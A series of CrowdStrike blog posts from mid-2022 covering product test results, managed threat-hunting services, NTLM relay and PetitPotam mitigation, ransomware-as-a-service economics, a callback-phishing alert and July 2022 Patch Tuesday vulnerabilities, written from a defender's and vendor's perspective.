We believe that the trifecta for stopping breaches is to unify the world’s best platform, with the industry’s deepest data to power AI/ML and automation, all bolstered by elite human expertise. We’re proud to have been ranked No. 1 market share for 2021 in the IDC Worldwide Corporate Endpoint Security Market Shares, 2021 report, but we are even more excited about what this means for our customer as we continue to broaden our reach, creating a virtuous cycle that keeps adversaries on their heels.

Additional Resources

CrowdStrike Falcon Pro for Mac Achieves 100% Mac Malware Protection, Wins Fifth AV-Comparatives Approved Mac Security Product Award

28 June 2022 at 07:28
  • CrowdStrike Falcon Pro for Mac achieved 100% Mac malware protection in the May 2022 AV-Comparatives Mac Security Test and Review 
  • CrowdStrike Falcon Pro for Mac has now won five consecutive Approved Mac Security Product Awards from AV-Comparatives, one of the leading third-party independent organizations testing the efficacy of endpoint security solutions in protecting against malware
  • CrowdStrike Falcon Pro for Mac uses cloud-based and on-sensor machine learning to proactively protect against threats

CrowdStrike believes that continuous testing and evaluation by third-party organizations is critical in helping customers make informed decisions about which security solution best fits their needs. This is why CrowdStrike continues to participate in more third-party testing than any other next-gen endpoint cybersecurity vendor.

We’re proud to announce the results of the latest evaluation: CrowdStrike achieved the highest Mac malware protection score in the May 2022 AV-Comparatives Mac Security Test and Review, scoring 100% Mac malware protection with Falcon Pro for Mac. This marks the fifth consecutive time that CrowdStrike has won the Approved Security Product Award.

One of the leading third-party independent testing organizations, AV-Comparatives evaluated the efficacy of 10 endpoint security products in detecting 471 recent and representative malicious Mac samples collected during the first half of 2022. CrowdStrike Falcon Pro for Mac once again stood out against the competition, demonstrating the proactive capability to accurately detect and block new and unknown threats by using the power of cloud-based and on-sensor machine learning.

AV-Comparatives Testing Methodology

The Malware Protection Test part of the Mac Security Test and Review 2022 from AV-Comparatives assesses the efficacy of endpoint security vendors in detecting and protecting against recent macOS malware and threats that reflect the current threat landscape.

AV-Comparatives requires a high endpoint protection rate to win certification during the evaluation, as third-party endpoint security solutions for macOS are not always present. Because potential exposure to Mac malware could have serious consequences, it’s crucial that a security solution has high endpoint protection capabilities for the evaluation.

The Mac Security Test and Review 2022 also assessed endpoint detection capabilities for potentially unwanted applications (PUAs) for Mac, such as adware and bundled software that can disrupt system usability and performance. PUA testing also examined the ability to detect Windows malware on macOS, for while Windows malware is benign on macOS it may use Mac systems to reach Windows machines. The test involved 773 prevalent macOS PUA samples and 1,000 prevalent Windows malware samples.

How Falcon Pro for Mac Performed During Testing 

Falcon Pro for Mac uses a layered approach to protect endpoints from new and unknown malware and threats by employing both on-sensor and in-the-cloud machine learning capabilities coupled with behavior-based malware detection

Throughout the Malware Protection Test, the CrowdStrike Falcon® sensor achieved 100% protection against all Mac malware samples, with zero misses on detecting macOS malware and threats that reflect the current threat landscape. Falcon Pro for Mac demonstrated excellent capability in instantly protecting endpoints from new and unknown malware as soon as it touched the system. 

While PUAs are not malicious per se, and Windows malware doesn’t execute on macOS — it’s completely inert — Falcon Pro for Mac detected 98% of Mac PUAs and 84% of Windows PUAs on macOS.

Fifth AV-Comparatives Approved Mac Security Product Award 

CrowdStrike remains committed to participating in independent tests from leading third-party organizations. The recent AV-Comparatives Approved Mac Security Product Award demonstrates our consistent excellent performance in protecting endpoints from macOS malware and threats and our ability to achieve public testing parity in protecting from both Windows and Mac malware and threats.

Winning the fifth consecutive Mac Security Product award from AV-Comparatives highlights the power of the Falcon platform in delivering machine learning-powered and layered endpoint security to drive continued leadership in protecting macOS systems.

Additional Resources

Falcon OverWatch Elite in Action: Tailored Threat Hunting Services Provide Individualized Care and Support

29 June 2022 at 18:35

The threat presented by today’s adversaries is as pervasive as it is dangerous — eCrime and state-nexus actors alike are attempting to infiltrate companies and organizations of all sizes and across all verticals. 

While technology is a powerful tool for performing routine or repeatable analysis, the only way to effectively hunt and contain sophisticated and determined cyber threat actors is to use the expertise and ingenuity of human threat hunters.

The Telescope and the Microscope: Two Sides of the Threat Hunting Coin 

Threat hunting is an ever-evolving discipline that proactively tracks changes in adversaries’ behavior. It requires a broad awareness of the threat landscape — the telescopic view — and can be augmented by a deeper understanding of a customer’s pain points or areas of identified risk — the microscopic view. The most comprehensive threat hunting leverages both the telescopic and microscopic viewpoints, blending the insights gained from both perspectives to safeguard a customer’s assets from threats.

The CrowdStrike Falcon OverWatch™ team’s continuous hunting operations are driven by a world-class team of dedicated in-house threat hunters — individuals who are relentlessly committed to honing their craft and dedicated to the mission of stopping breaches. OverWatch analysts track the most stealthy and persistent hands-on-keyboard campaigns, actively hunting for that last 1% of malicious activity deliberately seeking to subvert technology-based controls. 

Using patented hunting tools, OverWatch hunters leverage the power of the CrowdStrike Security Cloud to hunt across in excess of one trillion events a day — proactively searching for that malicious activity designed to blend in with the benign. Given the sheer breadth of information available to them, OverWatch analysts are skilled at identifying even the faintest signs of activity indicative of threat actor behavior and emerging threats, enabling customers to rapidly disrupt malicious behavior before its impact is felt.

The Power of Elite Tailored Threat Hunting

For organizations that are looking for an active partnership with their hunters, CrowdStrike offers OverWatch Elite — the personalized customer engagement add-on for  CrowdStrike’s Falcon OverWatch managed threat hunting service. 

OverWatch Elite builds on the continuous 24/7 human-led threat hunting provided by OverWatch, leveraging the ability to hunt across global telemetry to address areas of concern identified by customers. OverWatch Elite customers have access to an assigned threat analyst who provides a range of services to drive improved maturity across a customer’s internal security team. These services include expert coaching to support any in-house hunting efforts, regular threat updates, and a dedicated line of communication to address any queries or concerns as they arise. In partnership with their assigned analyst, customers can develop, operationalize and tune their threat hunting programs to ensure that supplementary threat hunts are tailored to their needs.

OverWatch Elite analysts build close partnerships with their assigned customers to develop a shared understanding of an organization’s unique structure and requirements. OverWatch Elite analysts are then able to tune their tools to the particular nuances found within a customer’s environment. In addition to addressing the customer’s needs, this fine-tuning enables all OverWatch analysts to more easily identify hands-on-keyboard activity and respond promptly to potential threats. 

The fast, closed-loop communication between customers and the OverWatch Elite team allows for greater collaboration to address  issues. Whether a customer has seen the news about a recent vulnerability or read an intelligence report about certain threat actors targeting companies in their sector, assigned analysts are available to listen and respond to these concerns by performing threat hunts tailored to address them. 

Working Better Together

It is important to recognize that these two parts of OverWatch share a common mission: stopping breaches. OverWatch and OverWatch Elite analysts work hand-in-hand daily to ensure all customers are protected against those malicious hands-on-keyboard activities designed to evade detection. All teams under the OverWatch umbrella work together continuously to provide the best customer service possible. 

OverWatch Elite Manager Gareth Willams puts it best: “You can’t look at the moon with a microscope and you can’t use a telescope to see small objects, but both give you a great field of vision.” 

In addition to tailored threat hunting services, OverWatch Elite offers several additional  features that truly make this a customer engagement-centric managed threat hunting service. Additional offerings include 60-minute call escalation for critical threats, which provides OverWatch Elite customers added peace of mind when it comes to rapidly disrupting adversary activity within their environments. OverWatch Elite customers are also invited to a private Slack channel where they can reach an OverWatch Elite analyst to respond with speed and confidence.

For more information, please visit OverWatch Elite’s page on CrowdStrike’s website.

Additional Resources

Detecting and Mitigating NTLM Relay Attacks Targeting Microsoft Domain Controllers

29 June 2022 at 18:52

Adversaries often exploit legacy protocols like Windows NTLM that unfortunately remain widely deployed despite known vulnerabilities. Previous CrowdStrike blog posts have covered critical vulnerabilities in NTLM that allow remote code execution and other NTLM attacks where attackers could exploit vulnerabilities to bypass MIC (Message Integrity Code) protection, session signing and EPA (Enhanced Protection for Authentication)

The PetitPotam vulnerability, combined with AD-CS relay, is one of the recent severe NTLM relay variations the CrowdStrike Identity Protection research team have seen, which indicates its high popularity. While the latest Microsoft security update — released on Patch Tuesday, May 10, 2022 — included a patch for the aforementioned vulnerability, it does not fully mitigate the issue. It does, however, change the requirements from being able to run the attack unauthenticated, to requiring any Active Directory account credentials to trigger the attack. 

In this blog, we detail the fix, the remaining issues and an enhancement to Falcon Identity Protection’s existing NTLM relay detection, which detects exploitation of the PetitPotam vulnerability and similar authentication coercion techniques.  

PetitPotam and NTLM Relay

NTLM relay has always been a popular attack technique. In the past, the biggest challenge was to solicit a user account to authenticate to an attacker-controlled machine; now it seems that endpoint authentication coercion mechanisms are gaining popularity. 

The most popular targets, for obvious reasons, are domain controllers, as their high privileges make them a lucrative target for authentication relay attacks. The first authentication coercion mechanism involved the Print Spooler service, while the newer one relies on the MS-EFSRPC protocol. The latter is also known as the PetitPotam attack. When combined with the insecure default configuration of the Active Directory Certificate Services (AD-CS), which does not enforce Extended Protection for Authentication (EPA), it could be deadly as it can lead to a full domain compromise in a few steps. An attacker could trigger a domain controller authentication by exploiting the PetitPotam vulnerability and relaying it to the AD-CS server to request a certificate for the domain controller account. Using this certificate, a malicious actor can then retrieve a TGT for the relayed domain controller account and perform any further operations using its high privileges (e.g., dump domain admin hashes). 

One of the most severe issues with the PetitPotam vulnerability, prior to Microsoft’s latest security updates, was that an attacker could run the attack unauthenticated (i.e., only network access to the domain controller was required). The patch only partially mitigates the issue, meaning an attack is still possible.

The Released Fix(es) and Remaining Issues

The Microsoft security update released on Patch Tuesday, May 10, 2022, included a partial patch for the PetitPotam vulnerability. This update, however, also caused authentication failures for various Windows services such as Network Policy Server (NPS), Routing and Remote Access Service (RRAS), Radius, Extensible Authentication Protocol (EAP) and Protected Extensible Authentication Protocol (PEAP). According to Microsoft, “An issue has been found related to how the mapping of certificates to machine accounts is being handled by the domain controller.” 

As a workaround, Microsoft recommended to manually map certificates to Active Directory accounts or follow KB5014754 for other possible mitigations. Because of the issues caused by the patch, CISA warned against deploying it on domain controllers, which left many organizations wide open to the unauthenticated PetitPotam authentication coercion attack. On May 19, 2022, an out-of-band update was made available to fix the authentication failures caused by the latest security update.

It is important to note that the security update states, “This security update detects anonymous connection attempts in LSARPC and disallows it,” which leaves the question: Does the coercion attack still work using an authenticated user?

Following some testing, it looks like the answer is yes!

While the PetitPotam vulnerability, when patched, will no longer work unauthenticated, it can still be abused by leveraging any Active Directory account credentials to trigger domain controller NTLM authentication, which can be relayed to a escalate to domain admin privileges if the required security settings are not enforced (as previously mentioned, EPA is not enforced by default on AD-CS servers).

Moreover, PetitPotam is no longer the newest authentication coercion method; the attack tool DFSCoerce, which abuses the MS-DFSNM protocol to trigger domain controller authentication, has since been released. 

Enhancing CrowdStrike Identity Protection NTLM Relay Detection

Because an authenticated user can still trigger an NTLM authentication from the domain controller, the NTLM relay attack vector remains relevant for domain controller accounts. This is why the NTLM relay detection capability of CrowdStrike Falcon Identity Threat Protection was enhanced to detect attempts to perform NTLM relay using domain controller credentials. The benefit of this detection is that it is not tied to any single authentication coercion method, but will detect a relay attack no matter if it is initiated by the PetitPotam vulnerability, the newer DFSCoerce tool or any coercion mechanism discovered in the future.

(Click to enlarge)

Watch this video on Falcon Spotlight™ to see how you can monitor and prioritize NTLM relay issues and other vulnerabilities within your environment, and this video to learn how Falcon Identity Threat Protection  helps ensure comprehensive protection against identity-based attacks in real time.

Additional Mitigations

Though patching is an important first step against the latest NTLM relay vulnerabilities, it is not enough, as many unsecured defaults can leave your domain vulnerable. This is why we recommend following these steps:

  1. Enforce Signing (SMB/LDAP) and Extended Protection for Authentication (EPA) for all relevant servers, especially the AD-CS servers, which are a common target of this attack.
  2. Track any failed/successful NTLM relay attempts performed in your domain network. Using the enhanced detection capabilities of the CrowdStrike Falcon Identity Threat Protection, customers can now be alerted on NTLM relay attacks abusing domain controller accounts.
  3. Disable NTLM. Because this is a potentially breaking change that requires a lot of time in most environments, start by disabling NTLM support on servers that may be targeted during a relay attack and are not sufficiently protected. For example, if for any reason you are unable to enforce EPA on the AD-CS server, disable incoming NTLM on that server to protect it from NTLM relay attacks.

Additional Resources

  • Learn more about popular attack techniques at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • Learn how CrowdStrike Falcon Identity Protection reduces costs and risks across the enterprise by protecting workforce identities.
  • Watch this video to see how Falcon Identity Threat Protection detects and stops ransomware attacks.
  • Learn how the powerful CrowdStrike Falcon platform provides comprehensive protection across your organization, workers and data, wherever they are located.
  • Get a full-featured free trial of CrowdStrike Falcon Prevent™ and see for yourself how true next-gen AV performs against today’s most sophisticated threats.

Tales from the Dark Web: How Tracking eCrime’s Underground Economy Improves Defenses

30 June 2022 at 19:46

Cybercriminals are constantly evolving their operations, the methods they use to breach an organization’s defenses and their tactics for monetizing their efforts. 

In the CrowdStrike 2022 Global Threat Report, we examined how the frequency and sophistication of ransomware attacks has grown in the past year. CrowdStrike Intelligence observed an 82% increase in ransomware-related data leaks in 2021 compared with 2020; further, we found 62% of attacks use hands-on-keyboard activity — indicating adversaries continuously advance their tradecraft to bypass legacy security solutions and extort victims via highly targeted data leaks. What are the forces driving this growth, and how exactly do cybercriminals make money?

The Fast-Growing, Lucrative Business Model Enabled by RaaS

Ransomware is not new; adversarial groups have relied on compromises for many years. However, over the past 2-3 years, their strategy has started to shift toward a more community based business model enabled by ransomware-as-a-service (RaaS) platforms that allow smaller, less advanced criminals to join a larger operation. 

At the top of this model is an operator who sets up a RaaS platform that takes care of multiple technical tasks such as on-demand ransomware packaging, command and control of deployed ransomware, cryptography, data extraction, archiving, online extortion and others. 

Less sophisticated cybercriminals with minimal hacking knowledge can join this operation after being vetted; when they do, they’ll receive 70 to 80% of the paid ransom. These emerging criminals are also assisted by access brokers, through which they can acquire access to the infrastructure of a potential victim. The interaction between all these criminal entities — RaaS operators, vetted affiliates, access brokers and other participants — happen via criminal forums, underground markets and anonymous posts. CrowdStrike continuously monitors these environments, and users may receive alerts regarding market and forum activity.

Access Brokers: How Adversaries Get In

The eCrime kill chain is often enabled by access brokers, the intruders who gain access to an organization’s infrastructure and then sell illicitly obtained credentials and other access methods to buyers in underground communities.

Adversaries buy compromised credentials to make the process of getting into a target organization easier and more efficient. Access brokers sell a broad range of access types, including financial account logins, business email account credentials, remote access to network assets and custom exploits for IT infrastructure.

To advertise compromised credentials and other access methods on the underground, access brokers use particular keywords and target specific marketplaces. However, their posts often leave behind “breadcrumbs” that offer defenders an opportunity to detect compromised accounts or risks of security incidents. For example, an access broker may include attributes such as company details (size, revenue, industry), IT infrastructure details, the malware used to steal credentials, or the access broker’s alias.

The amount of chatter on underground forums is massive. CrowdStrike’s managed service, Falcon X Recon+ provides security teams assistance by offering custom expertise to monitor and triage threats found in these forums on your behalf. CrowdStrike experts can guide organizations of all sizes to identify unwanted data exposure or threats like account takeovers and brand-targeted attacks. 

Distribution Services: A Force Driving Ransomware

CrowdStrike’s analysis of ransomware campaigns by groups such as Pinchy Spider, also known as REvil, Wizard Spider (Conti) and Carbon Spider (DarkSide) has made it clear the operators behind these campaigns no longer work alone, in particular when compromising assets and injecting the ransomware. Ransomware operators advertise on underground forums to recruit affiliates who can help them distribute ransomware and share the profits. 

These affiliates leverage RaaS infrastructure from the operators. After targeting and compromising a victim’s assets, they drop ransomware from the RaaS platform, set the ransom demand and get 70 to 80% of the ransom payment in return. Victims are often chosen based on the likelihood they’ll be able to afford a ransom; affiliates often calculate ransom payouts based on company revenue and business impact to maximize their profits. 

Operators provide technical services in return for affiliates’ help in distributing ransomware. They may provide a packager to generate customized ransomware so affiliates can distribute over their own channels; cryptographic key management; or internet infrastructure for data exfiltration and storage. They may share payment instructions to receive virtual currencies from victims; secret communication channels to hide affiliates when they talk to victims; and even a help desk to aid victims in paying the ransom. These services give a boost to less tech-savvy adversaries, who benefit from access to technically advanced malware at low cost. 

CrowdStrike Intelligence analysts found multiple initial access and lateral movement techniques that affiliates use before deploying ransomware. By changing how they distribute ransomware, adversaries can find new ways to bypass security measures. Below are a few examples of how attackers gain initial access:

  • Buying stolen credentials from access brokers. Affiliates often use legitimate  credentials to gain a foothold. Remote Desktop Protocol (RDP) is a popular entryway.
  • Spam or social engineering. Among the most common initial access vectors.
  • Vulnerability scanning and exploit kits. These kits can be found on multiple forums and target specific software or systems to gain access and install additional code . Exploit kits can be combined with phishing campaigns to boost their effectiveness.
  • Loader and botnet usage. Loaders, often a step between phishing campaigns and ransomware deployment, use malicious documents like macro-enabled spreadsheets to download and execute malicious code.
  • Post-exploitation tools and “living off the land.” Adversaries that access a system will explore the network to find critical data or applications that can help further an attack. Some use system tools like PSExec or PowerShell scripts to remain hidden.

A better understanding of adversary techniques can help improve your defenses. Organizations must know which attackers are targeting their region or industry, whether they are recruiting affiliates, and how their ransomware is distributed.By understanding the adversary and their tools, defenders can employ an intelligence-first defense strategy based on the threats they face.

Monetization: How Cybercrime Pays

Once ransomware is deployed into a victim environment, the prize needs to be split and monetized into other payment forms. CrowdStrike’s observations of the cybercrime ecosystem offer new insights into adversaries, their transactions and valuation of recent compromises — all of which can help defenders understand how money flows in cybercrime and strengthen their security strategies.

Adversaries constantly evolve their monetization techniques to maximize the chance of payment. Their methods are working: reports from the U.S. Treasury Department’s Financial Crimes Enforcement Network (FinCen) and the Office of Foreign Assets Control (OFAC) underscore how lucrative ransomware has become. FinCen found the value of suspicious activity detailed in ransomware-related suspicious activity reports (SARs) was $590 million USD in the first six months of 2021 — far higher than the $416 million USD reported in all of 2020. Further, CrowdStrike’s Intelligence team also tracks ransomware demands: in 2021, we calculated an average demand of $6.1 million USD, an increase of 36% from 2020. 

If a victim refuses to pay ransom, their data may be auctioned by the threat actor so they can still make money on it by selling it to other parties or adversaries.

Corporate data is valuable to all adversaries. Once they have it, the data can be easily monetized and present increased risk to your organization if other attackers have access to it. Defenders must develop a stronger understanding of cybercriminals’ behavior — and the broader eCrime ecosystem — in order to make smarter security decisions that best protect data as their most valuable asset.

In the “Tales from the Dark Web” white paper series, we explore the increased specialization of adversaries inside the criminal underground. This includes the changing tradecraft for gaining initial access, achieving lateral movement, exfiltrating data and leveraging it to extort their targets. By understanding how adversaries specialize in these critical areas to gain scale and efficiency, organizations can better prepare their defenses. 

Rather than simply illustrate the problems defenders face, the insights from these white papers will arm security teams with actionable information, enabling them to better prepare for the attacks emerging from the criminal underground. 

Additional Resources

How CrowdStrike’s Machine Learning Model Automation Uses the Cloud to Maximize Detection Efficacy

1 July 2022 at 13:41
  • The CrowdStrike Falcon® platform takes full advantage of the power of the CrowdStrike Security Cloud to reduce high-cost false positives and maximize detection efficacy to stop breaches 
  • CrowdStrike continuously explores novel approaches to improve machine learning automated detection and protection capabilities for Falcon customers
  • CrowdStrike’s cloud-based machine learning model automation can predict 500,000 feature vectors every second and cover 10TB of files per second to find detections

 At CrowdStrike, we combine cloud scale with machine learning expertise to improve the efficacy of our machine learning models. One method for achieving that involves scanning massive numbers of files that we may not even have in our sample collections before we release our machine learning models. This prerelease scan allows us to maximize the efficacy of our machine learning models while minimizing negative impact of new or updated model releases.

It’s important to understand that machine learning models take over when discrete algorithms fall short. CrowdStrike machine learning does an excellent job of creating models that can detect impactful in-the-wild novel threats like NotPetya, BadRabbit or HermeticWiper along with other malware families. CrowdStrike’s comprehensive detection capabilities have been consistently validated in independent third-party testing from leading organizations including AV-Comparatives. However, machine learning looks at the world through probabilities, and those probabilities can make understanding why an incorrect detection was made unpredictable and difficult to understand.

Incorrect detections, also known as false positives, are a concern with any endpoint security solution and exacerbate the ongoing skills shortage most organizations face. Any incorrect assessment of a clean file as malicious can immediately trigger remediation procedures that can take down services, disrupt workflows and distract analysts from hunting down legitimate threats. However, not all false positives are created equal, for the cost of any mistakes should be compared to the benefit given by correct detections. CrowdStrike has implemented novel solutions to the false positive predicament.

Clean or Dirty: Know the Difference

One approach involves accumulating billions of files in our cloud. These files come from various sources, ranging from protected environments to public malware collections, at a rate of approximately 86 million new hashes a day. The collection includes malicious code, clean code and unwanted code, such as potentially unwanted programs. 

To build our machine learning models, we carefully curate both clean and “dirty” (i.e., malicious) samples from this collection, resulting in a labeled collection that is growing by tens of millions of new examples every training cycle.

Extract the Right Features

To ensure the quality of the resulting models, we also gather from live environments the most interesting files to maximize the efficacy of the model. While some customers use the Falcon platform to share files with us so we can improve our coverage capabilities, others keep their files in-house for a variety of reasons. As a consequence, to build an effective model, we must ensure that it can perform well on in-house files not shared with us as well as on those that have been shared. However, to teach a machine learning model, first you must reduce these interesting files to a long list of transformed numeric values, called a feature vector, that represent various properties of the file. 

As humans, we learn to use our senses to extract features from the surrounding environment and then infer probable outcomes based on past experience. For example, if it’s cloudy outside and there’s a damp breeze, we infer there’s a high chance of rain and we need to grab an umbrella. In this case, cloudy and damp can be considered data points part of the feature vector that describes chances of rain. 

Of course, the feature list for files contains thousands of decimal numbers that humans can’t read but our artificial intelligence (AI) understands. That feature vector is uploaded to the cloud by the Falcon sensor, making it possible for us to observe what a new model would say about the underlying file by running predictions over that stored feature vector.

Figure 1. This flow describes how feature vectors and metadata are sent to the CrowdStrike Security Cloud and used against our machine learning model to help build better predictions.

Returning to the rain example, the feature vector with the two data points of cloudy and damp is assessed against what we know from experience to be signs of rain. If our experience has taught us that these two particular data points have a high probability of describing chances of rain, then we grab an umbrella. Otherwise, we assess this with low chances of rain. Much like machine learning models, it comes down to how well we are trained in spotting and recognizing signs of rain.

Measure Efficacy, Get It Right!

The same file feature vector can also be combined with additional information such as the prevalence of files that is contained within our security cloud. This means we can virtually scan all prevalent files in protected environments to measure efficacy and test for false positives. 

The results of this virtual scan are important for a number of reasons. First, it enables us to identify important files which will have a high impact in the next model release.  Second, we can minimize potential high-cost false positives prior to deployment.  Finally, this information is used to teach future models. 

For example, based on a prevalence threshold, we advance our scan to include all files found on a significant number of devices. We then consider all of our detections. Those that are incorrect we resolve with our cloud by replying to our sensors to prevent future detection, and include the files that triggered an incorrect detection in the next retrain of our model. Correct detections, on the other hand, are added both to our cloud for immediate detection and to the files used in training our models in the future. 

Again, returning to the rain example, this virtual scan is like checking multiple weather forecasting websites as soon as we have the two signs — cloudy and damp — before leaving the house with or without an umbrella. Some of those websites may be correct in predicting rain, others may not, but the next time it’s cloudy and damp we will know which websites are reliable before we go outside and risk being caught in the rain without an umbrella.

CrowdStrike’s Automated Cloud-Based Machine Learning Model Maximizes Efficacy

While CrowdStrike analysts inspect millions of files, the number of files detected as malicious is remarkably small enough that they can be analyzed by hand. Because our analysts and processes work better on samples that we have instead of information about samples, we start our analysis with those detections we can also find in our massive sample store. 

Using feature vectors, the Falcon platform enables us to know quite a bit about the files we don’t have, and also allows us to use the power of the cloud to enhance detection or resolve incorrect detections of files not contained in our sample store.

Comparing global virtual scans of prevalent files against all of our static detection models is critical in pushing the accuracy and efficacy of our machine learning models to help secure our customers and stop breaches.

In essence, the power of the Falcon platform lies in its ability to take full advantage of the massive data fabric we call the CrowdStrike Security Cloud, which correlates trillions of security events from protected endpoints with threat intelligence and enterprise telemetry. The Falcon platform uses machine learning and AI to automate and maximize the efficacy of detecting and protecting against threats, to stop breaches.

Additional Resources

  • Find out more about machine learning and the power of the CrowdStrike Security Cloud at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • Learn more about the CrowdStrike Falcon® platform by visiting the product webpage.
  • Test CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.

Callback Malware Campaigns Impersonate CrowdStrike and Other Cybersecurity Companies

Today CrowdStrike sent the following Tech Alert to our customers:

On July 8, 2022, CrowdStrike Intelligence identified a callback phishing campaign impersonating prominent cybersecurity companies, including CrowdStrike. The phishing email implies the recipient’s company has been breached and insists the victim call the included phone number. This campaign leverages similar social-engineering tactics to those employed in recent callback campaigns including WIZARD SPIDER’s 2021 BazarCall campaign.

This campaign will highly likely include common legitimate remote administration tools (RATs) for initial access, off-the-shelf penetration testing tools for lateral movement, and the deployment of ransomware or data extortion.

Details

The callback campaign employs emails that appear to originate from prominent security companies; the message claims the security company identified a potential compromise in the recipient’s network. As with prior callback campaigns, the operators provide a phone number for the recipient to call (Figure 1).

Figure 1. Example of CrowdStrike-Themed Phishing Email

Historically, callback campaign operators attempt to persuade victims to install commercial RAT software to gain an initial foothold on the network. For example, CrowdStrike Intelligence identified a similar callback campaign in March 2022 in which threat actors installed AteraRMM followed by Cobalt Strike to assist with lateral movement and deploy additional malware. 

Assessment

While CrowdStrike Intelligence cannot currently confirm the variant in use, the callback operators will likely use ransomware to monetize their operation. This assessment is made with moderate confidence, as 2021 BazarCall campaigns would eventually lead to Conti ransomware — though this ransomware-as-a-service (RaaS) recently ceased operations. This is the first identified callback campaign impersonating cybersecurity entities and has higher potential success given the urgent nature of cyber breaches.

CrowdStrike will never contact customers in this manner.

Any customers receiving an email such as those in this Alert should forward phishing emails to [email protected]

Additional Resources

Top Threats You Need to Know to Defend Your Cloud Environment

11 July 2022 at 00:01

The CrowdStrike eBook, “Protectors of the Cloud: Combating the Rise in Threats to Cloud Environments,” reveals how adversaries target and infiltrate cloud environments and recommends best practices for defense.

As organizations move critical applications and data to the cloud, these resources have come under increasing attack. Adversaries view cloud environments as soft targets and continue to refine tactics and tradecraft to exploit the vulnerabilities and misconfigurations within them. 

Though this attack trend was underway before the COVID-19 pandemic, the need to support mostly remote, distributed workforces increased organizations’ reliance on cloud resources — which in turn amplified adversaries’ focus on exploiting the cloud. Attackers were circling throughout 2021, often attempting to compromise cloud infrastructure and assets by exploiting misconfigurations and stolen user credentials. 

In “Protectors of the Cloud: Combating the Rise in Threats to Cloud Environments,” we outline common attack vectors adversaries use to breach cloud environments, including credential theft, vulnerability exploitation, abuse of cloud service providers, exploitation of misconfigured image containers, and use of cloud services for hosting malware and command and control. 

Additionally, you will learn:

  • How state-sponsored adversaries, such as COZY BEAR, target IT and cloud service providers to exploit trusted relationships and supply chain partners 
  • How sophisticated adversaries harvest, then exploit stolen credentials and identities to amplify ransomware big game hunting (BGH) attacks and infiltrate cloud environments
  • How malicious actors intensify attacks on critical cloud infrastructure by exploiting misconfigured image containers and targeting vulnerabilities
  • How adversaries target neglected cloud infrastructure slated for retirement that still contains sensitive data
  • Which best practices cloud security experts recommend for defending cloud infrastructure

Adversaries Seek to Exploit Trust in the Cloud 

The ebook shows how, in addition to credential theft and vulnerability exploitation, adversaries leverage cloud service providers in an attempt to abuse the trust between these service providers and their customers. In doing so the adversary seeks access to additional targets through lateral movement from cloud-hosted enterprise authentication assets. If an adversary can elevate their privileges to global administrator levels, they may be able to pivot between related cloud tenants to expand their access. Other covered adversarial tactics and trends include exploiting misconfigured image containers and using legitimate cloud services to host malware and perform command and control activities. 

The ebook also describes the tactics of two significant threat groups, FANCY BEAR and COZY BEAR, that are Russian in origin and target cloud services as part of their strategy. 

  • In 2021, FANCY BEAR targeted numerous cloud-based email providers — including Microsoft O365 and webmail services likely to be used by individuals — using a variety of tactics. Credential theft is a critical part of FANCY BEAR’s strategy, which serves as a reminder that organizations should focus on anti-phishing technologies and user awareness training to aid the identification of phishing emails and other credential-stealing techniques. 
  • COZY BEAR has demonstrated extensive knowledge of cloud service infrastructure and administration as well as the use of extensive operational security methods to reduce their chances of being detected.

Given threat actors’ increasing focus on attacking the cloud, CrowdStrike takes an adversary-focused approach that unifies on-premises and cloud security by combining capabilities such as cloud security posture management and cloud workload protection for multicloud environments with the latest threat intelligence. As adversaries grow more sophisticated, protecting cloud assets will likely become more complex. Battling these adversaries will require a comprehensive approach to security that enables organizations to maintain compliance, visibility and enforcement regardless of where their data and applications reside.

Additional Resources

July 2022 Patch Tuesday: Four Critical CVEs and a Zero-Day Bug Under Active Exploitation

14 July 2022 at 19:51

Microsoft has released 84 security patches for its July 2022 Patch Tuesday rollout. Four vulnerabilities are rated Critical in severity and the rest are classified as Important, with one (CVE-2022-22047) under active exploitation. In this blog, the CrowdStrike Falcon Spotlight™ team offers an analysis of this month’s vulnerabilities, as well as insights into the vulnerabilities and patches affecting Microsoft products in the first half of this year. We highlight the CVEs in this month’s update that are most severe and recommend how to prioritize patching.

July 2022 Risk Analysis

The top three attack types — elevation of privilege, remote code execution (RCE) and information disclosure — continue to dominate, with denial of service following at almost 6%.

Figure 1. Breakdown of July 2022 Patch Tuesday attack types

Microsoft Windows received the most patches this month, with Extended Security Updates (ESUs) following close behind. There are also patches for 33 Azure vulnerabilities this month and a couple for Microsoft Office products.

Figure 2. Breakdown of July 2022 Patch Tuesday affected product families

Zero-Day CSRSS Vulnerability Under Active Exploitation

CVE-2022-22047 is listed as being under active attack, but there’s no information from Microsoft on where, or how widely, the vulnerability is being exploited. This vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which are now disabled by default.

Rank CVSS Score CVE Description
Important 7.8 CVE-2022-22047 Windows CSRSS Elevation of Privilege

CrowdStrike recommends that you monitor your environment to see if it is affected by this vulnerability and apply the fix offered. For CrowdStrike customers using Falcon Spotlight, this CVE is ranked as Critical.

Critical Vulnerabilities in Network File System and RPC

Four vulnerabilities ranked as Critical received patches this month. Affected products are Remote Procedure Call (RPC), Windows Network File System (NFS) and Windows Graphics Component. Let’s review a couple of these vulnerabilities and how they could affect an organization’s environment.

CVE-2022-22038: This vulnerability could allow a remote, unauthenticated attacker to exploit code on an affected system. While not specified in the bulletin, the assumption is that, with elevated privileges, code execution would occur. By combining these attributes, you may end up with a potentially wormable bug. Microsoft rates the attack complexity as high since an attacker would need to make “multiple exploitation attempts” to take advantage of this vulnerability, but again, unless you are actively blocking RPC activity, you may not see these attempts. If the exploit complexity were rated low, which some would argue it should be since the attempts could likely be scripted, the CVSS would be 9.8. CrowdStrike recommends that you test and deploy this patch quickly.

CVE-2022-22029: This is the third month in a row with a Critical-rated NFS vulnerability, and while this one has a lower CVSS than the previously listed vulnerabilities, it could still allow a remote, unauthenticated attacker to execute their code on an affected system with no user interaction. Microsoft notes multiple exploit attempts may be required to do this, but unless you are specifically auditing for this, you may not notice. If you’re running NFS, make sure you don’t ignore this patch.

Rank CVSS Score CVE Description
Critical 8.8 CVE-2022-30221 Windows Graphics Component Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-22038 Remote Procedure Call Runtime Remote Code Execution Vulnerability
